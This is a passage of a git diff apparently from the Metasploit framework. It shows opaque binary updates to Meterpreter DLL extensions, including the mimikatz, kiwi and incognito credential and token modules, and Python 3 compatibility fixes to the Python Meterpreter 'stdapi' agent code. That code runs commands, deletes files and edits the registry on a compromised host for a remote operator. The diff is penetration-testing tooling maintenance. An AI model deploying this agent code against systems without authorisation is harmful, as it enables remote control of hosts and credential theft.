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 V{ww{rdTOSB(FxUEE~A_3{{w=DH8=nO diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index d919cc4810bba46b9348ead110daf43b093ad30c..76e2634b33911ebfe68796507d7fca72476164ca 100755 GIT binary patch delta 38 scmZoTz}9epZNdv?_4^YhzV>Bi$zy7^X54Pg$apgqB(_~Vo$;jw04(wjzW@LL delta 38 scmZoTz}9epZNdxYb^kghzV>BiUdz~Q&A8o~k@03KNNl@!I^#<V07*#@H~;_u diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index 3dc39f853286a219e8626598ba1536b9e7208e7f..3767662ee55925304461034062e85eb0eb72d808 100755 GIT binary patch delta 39 tcmZo@VQXk%TfoS??%ssS%#6Ow9)}s5gBiC6GcsNb1PN|e4`#fn2LKbg4kZ8p delta 39 tcmZo@VQXk%TfoSi@ULSsGovr_944mbV8-pijEolpL4w=WgBfq?0RRHm4NU+5 diff --git a/data/meterpreter/ext_server_kiwi.x64.dll b/data/meterpreter/ext_server_kiwi.x64.dll index a95d1c2f32645f2734b953bc3affd0a91ec20653..6344153b8220f30d2d2c9fd80985217731e8c5fc 100755 GIT binary patch delta 47 zcmZozBiOJ;a03S;bMO5LlermvnNH7aj$&+&VgzBP?NN-(yB>h#wu?Vvepw6vmRJ$z delta 47 zcmZozBiOJ;a03S;^Ot`elermvnL2MYM=`cXF@iAD_9#Z?T@OHV+r=L-zbpm-tVj~z diff --git a/data/meterpreter/ext_server_kiwi.x86.dll b/data/meterpreter/ext_server_kiwi.x86.dll index 5348692063509599b42584d72f41e6a4fe199a32..501034aefff5532cfe44716296b1a7b9e5b6c67e 100755 GIT binary patch delta 48 zcmZo@;BRQ)-yp!q%yEChWMM{M=I4)?o0A#alNmvnX?rpw^T%kA<o57b=9NhRf!7c^ delta 48 zcmZo@;BRQ)-yp!qJm+7>WMM{M=KqQ;&B=`I$&4V(v^|-T`C~Lla(j3z^U5Rujx7-A diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll index 69577b3010f29eca617374e9685d7650c9e1d431..c1e174c7860c61f0d5b313d3bdfef76cbc58528c 100755 GIT binary patch delta 46 ycmZqp!rSnLcfto|z55d;e)eVN_F`#vW^8w61YxG_&Wy|tr9g7q)n%A(#sUDQnh<;d delta 46 ycmZqp!rSnLcftqeE&n<ue)eVN=wxnoW^8w61YxG_&Wy|tr9g7q)n%A(#sUDzUlH*D diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index 0ea7c89b886e227badf78f4c4226eef0903aae03..cc78481a50f008f887a0af5564951ab52be73e36 100755 GIT binary patch delta 41 vcmZo@;cjT*p74Wt%e@H`fBQ1+7H{@qZ1-Yh-0sE5w5uE>yq&$0>8A$(Y?2V} delta 41 vcmZo@;cjT*p74V?^<T%t-@Z(|;mux*?Ou$G+r1c>c9nyKx3gC={qz6;SfvmW diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index 85f80e20518a3425691fc4089a26126c937a5310..dbbf07b3cffb8b1b4e20004c6fb396071be02650 100755 GIT binary patch delta 92 zcmZqZP;BT>+`z%eTy}rLWNt=ZCdG5jQH<?Tj3CSe#LPg<0>rG_qZrxdsfZbxSQ!}t g5d#!>mF6iZn6~q&v2Ev5V|Qx@8MHloE&Ix80E4<1!T<mO delta 92 zcmZqZP;BT>+`z%e{PbVPWNt=ZCb3`5QH<?Tj3CSe#LPg<0>rG_qZrxdsfZbvTbY_$ i85=M_fp21^g0W#cpBmeCJ~ei?c922a!`HH}oCW~C_ZkBL diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index 7448559c11f1dd3d4c07a4e2f9ab801a212643ed..d722b30e70d28a03647f489aed2d4ea91b79faf4 100755 GIT binary patch delta 75 zcmZp8A<^(cVgV!b$9oedGc)=!RiritF}4RWf-n;hGj9)KWU0C!WN2b#XlZ3=!T<zb YrFjYprrYmbWcl_4q;dQ8ZLFHL0KWMedH?_b delta 75 zcmZp8A<^(cVgVy_-@lH@%#6NF`=&PsF}4RWf-n;hGj9)KWU0C!WMFP(YG!3%!2krl YiIob*hTHF5Wcl_4q;dQ8ZLFHL0L2{|YXATM diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index 9c91f1f7e492493415620db4772dd4ba8ab8c224..edbbc7bf7260f51ce052aca88842ae6f2c6e8316 100755 GIT binary patch delta 37 rcmZozz|pXPW5N$+;rkON{`O^J&uR8z-0sE5m~{*!w0-+=Mo$j_A*T-c delta 37 rcmZozz|pXPW5N&SMgKY`{`O@OUES=(xZR79G3yveX#4i#jGi6<Kba7c diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index 266ece2e297a97ae9264f74da5316add25167ebc..22755d0d5835a6a48374f3fcfa0b1009445867ea 100755 GIT binary patch delta 38 scmZqp!`ASJZNdlUS@$MP{Orp-`5I%hGvjt=M#hVcAhGS@&5SRt0B2AUV*mgE delta 38 scmZqp!`ASJZNdlUkbfN$Kl?I&7iDU8X58+~$at|4B(`0=nen9+09i8-s{jB1 diff --git a/data/meterpreter/ext_server_stdapi.jar b/data/meterpreter/ext_server_stdapi.jar index bef5cee0140fd78c4db9c9ac32eb29b3d7778bc5..b6a01cac095c0f8e799987555ea70dea3ae1b18e 100644 GIT binary patch delta 174 zcmV;f08#(`t^)q90+2NX8;47DkvT7apwL|vH)6q+TN#>>2HPY|(vP>dwTNyW^FH%t zN_6%?G3gs|wBF@v1(_6w&NfD$&2#2E$nNX?A|`!!<!TrPXenU~jkgIZ-%4?0!bIld z7Xho9REa$~wSf$_Qk=#_Za$$e9u0A>rnUc;X(SFjBgAAdSXh!$6kOG|C;oj4d2MLy cqWT(ANbv@fK>-@G3<2<g1RIA-bh3kf6pHCi8~^|S delta 174 zcmV;f08#(`t^)q90+2NXG)|x%kvT7afY4nlZp4Bsw=y&%4Yo;0rXO!_YZ2W%=6&YP zROsx366+hqWWCGP1~Mti-nK@c&2!-g$nM+CDzYwLxf;h2I$}(r^_HRbofOAN$Yef# z5wLDZRXC7SJIG)!#c5)4%L#q)Xej1tUi)vEM~WdX2#E~_3u{t}BG!!^DE__+ytXv; cNqr3|q<909K>-@G3<2<g1T;>d9<qae6sf{Z*8l(j diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index ae9cab6cb8..ed7e58701a 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -48,6 +48,24 @@ try: except ImportError: has_winreg = False +try: + import winreg + has_winreg = True +except ImportError: + has_winreg = (has_winreg or False) + +if sys.version_info[0] < 3: + is_str = lambda obj: issubclass(obj.__class__, str) + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') + long = int + if has_ctypes: # # Windows Structures @@ -498,11 +516,12 @@ def get_stat_buffer(path): blocks = si.st_blocks st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink) st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev) - st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime) + st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime)) st_buf += struct.pack('<II', blksize, blocks) return st_buf def netlink_request(req_type): + import select # See RFC 3549 NLM_F_REQUEST = 0x0001 NLM_F_ROOT = 0x0100 @@ -513,17 +532,25 @@ def netlink_request(req_type): sock.bind((os.getpid(), 0)) seq = int(time.time()) nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) - sfd = os.fdopen(sock.fileno(), 'w+b') - sfd.write(nlmsg) + sock.send(nlmsg) responses = [] - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + return responses + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] while response.type != NLMSG_DONE: if response.type == NLMSG_ERROR: break - response_data = sfd.read(response.len - 16) + response_data = raw_response_data[:(response.len - 16)] responses.append(response_data) - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) - sfd.close() + raw_response_data = raw_response_data[len(response_data):] + if not len(raw_response_data): + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + break + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] sock.close() return responses @@ -559,7 +586,7 @@ def channel_open_stdapi_fs_file(request, response): else: fmode = 'rb' file_h = open(fpath, fmode) - channel_id = meterpreter.add_channel(file_h) + channel_id = meterpreter.add_channel(MeterpreterFile(file_h)) response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) return ERROR_SUCCESS, response @@ -675,6 +702,7 @@ def stdapi_sys_process_execute(request, response): proc_h.stderr = open(os.devnull, 'rb') else: proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + proc_h.echo_protection = True proc_h.start() else: proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -693,15 +721,15 @@ def stdapi_sys_process_getpid(request, response): def stdapi_sys_process_get_processes_via_proc(request, response): for pid in os.listdir('/proc'): - pgroup = '' + pgroup = bytes() if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit(): continue - cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') - status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() + cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb') + cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8'))) + status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read()) status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) - status_data = filter(lambda x: len(x) == 2, status_data) status = {} - for k, v in status_data: + for k, v in filter(lambda x: len(x) == 2, status_data): status[k[:-1]] = v.strip() ppid = status.get('PPid') uid = status.get('Uid').split('\t', 1)[0] @@ -725,14 +753,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response): def stdapi_sys_process_get_processes_via_ps(request, response): ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command'] proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - ps_output = proc_h.stdout.read() + ps_output = str(proc_h.stdout.read()) ps_output = ps_output.split('\n') ps_output.pop(0) for process in ps_output: process = process.split() if len(process) < 4: break - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, int(process[0])) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1])) pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2]) @@ -793,7 +821,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): use = ctypes.c_ulong() use.value = 0 ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use)) - complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username) + complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username)) k32.CloseHandle(tkn_h) parch = windll_GetNativeSystemInfo() is_wow64 = ctypes.c_ubyte() @@ -802,7 +830,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)): if is_wow64.value: parch = PROCESS_ARCH_X86 - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID) pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username) @@ -850,16 +878,18 @@ def stdapi_fs_delete_dir(request, response): @meterpreter.register_function def stdapi_fs_delete_file(request, response): file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] - os.unlink(file_path) + if os.path.exists(file_path): + os.unlink(file_path) return ERROR_SUCCESS, response @meterpreter.register_function def stdapi_fs_file_expand_path(request, response): path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] if has_windll: + path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8')) path_out = (ctypes.c_char * 4096)() - path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out)) - result = ''.join(path_out)[:path_out_len] + path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out)) + result = str(ctypes.string_at(path_out)) elif path_tlv == '%COMSPEC%': result = '/bin/sh' elif path_tlv in ['%TEMP%', '%TMP%']: @@ -912,7 +942,8 @@ def stdapi_fs_md5(request, response): @meterpreter.register_function def stdapi_fs_mkdir(request, response): dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value'] - os.mkdir(dir_path) + if not os.path.isdir(dir_path): + os.mkdir(dir_path) return ERROR_SUCCESS, response @meterpreter.register_function @@ -965,7 +996,7 @@ def stdapi_fs_stat(request, response): @meterpreter.register_function def stdapi_net_config_get_interfaces(request, response): - if hasattr(socket, 'AF_NETLINK'): + if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'): interfaces = stdapi_net_config_get_interfaces_via_netlink() elif has_osxsc: interfaces = stdapi_net_config_get_interfaces_via_osxsc() @@ -974,7 +1005,7 @@ def stdapi_net_config_get_interfaces(request, response): else: return ERROR_FAILURE, response for iface_info in interfaces: - iface_tlv = '' + iface_tlv = bytes() iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown')) iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00')) if 'mtu' in iface_info: @@ -1002,7 +1033,7 @@ def stdapi_net_config_get_interfaces_via_netlink(): 0x0100: 'PROMISC', 0x1000: 'MULTICAST' } - iface_flags_sorted = iface_flags.keys() + iface_flags_sorted = list(iface_flags.keys()) # Dictionaries don't maintain order iface_flags_sorted.sort() interfaces = {} @@ -1106,7 +1137,7 @@ def stdapi_net_config_get_interfaces_via_osxsc(): hw_addr = hw_addr.replace(':', '') hw_addr = hw_addr.decode('hex') iface_info['hw_addr'] = hw_addr - ifnames = interfaces.keys() + ifnames = list(interfaces.keys()) ifnames.sort() for iface_name, iface_info in interfaces.items(): iface_info['index'] = ifnames.index(iface_name) @@ -1138,7 +1169,10 @@ def stdapi_net_config_get_interfaces_via_windll(): iface_info['index'] = AdapterAddresses.u.s.IfIndex if AdapterAddresses.PhysicalAddressLength: iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength) - iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description)) + iface_desc = ctypes.wstring_at(AdapterAddresses.Description) + if not is_str(iface_desc): + iface_desc = str(iface_desc) + iface_info['name'] = iface_desc iface_info['mtu'] = AdapterAddresses.Mtu pUniAddr = AdapterAddresses.FirstUnicastAddress while pUniAddr: @@ -1174,7 +1208,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib(): table_data = ctypes.string_at(table, pdwSize.value) entries = struct.unpack('I', table_data[:4])[0] table_data = table_data[4:] - for i in xrange(entries): + for i in range(entries): addrrow = cstruct_unpack(MIB_IPADDRROW, table_data) ifrow = MIB_IFROW() ifrow.dwIndex = addrrow.dwIndex @@ -1244,9 +1278,10 @@ def stdapi_registry_close_key(request, response): def stdapi_registry_create_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) res_key = ctypes.c_void_p() - if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, res_key.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response @@ -1255,18 +1290,20 @@ def stdapi_registry_create_key(request, response): def stdapi_registry_delete_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value'] if (flags & DELETE_KEY_FLAG_RECURSIVE): - result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key) + result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key)) else: - result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key) + result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key)) return result, response @meterpreter.register_function_windll def stdapi_registry_delete_value(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name) + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) + result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name)) return result, response @meterpreter.register_function_windll @@ -1335,9 +1372,10 @@ def stdapi_registry_load_key(request, response): def stdapi_registry_open_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) handle_id = ctypes.c_void_p() - if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, handle_id.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response @@ -1367,24 +1405,26 @@ def stdapi_registry_query_class(request, response): @meterpreter.register_function_windll def stdapi_registry_query_value(request, response): - REG_SZ = 1 - REG_DWORD = 4 hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = ctypes.c_uint32() value_type.value = 0 value_data = (ctypes.c_ubyte * 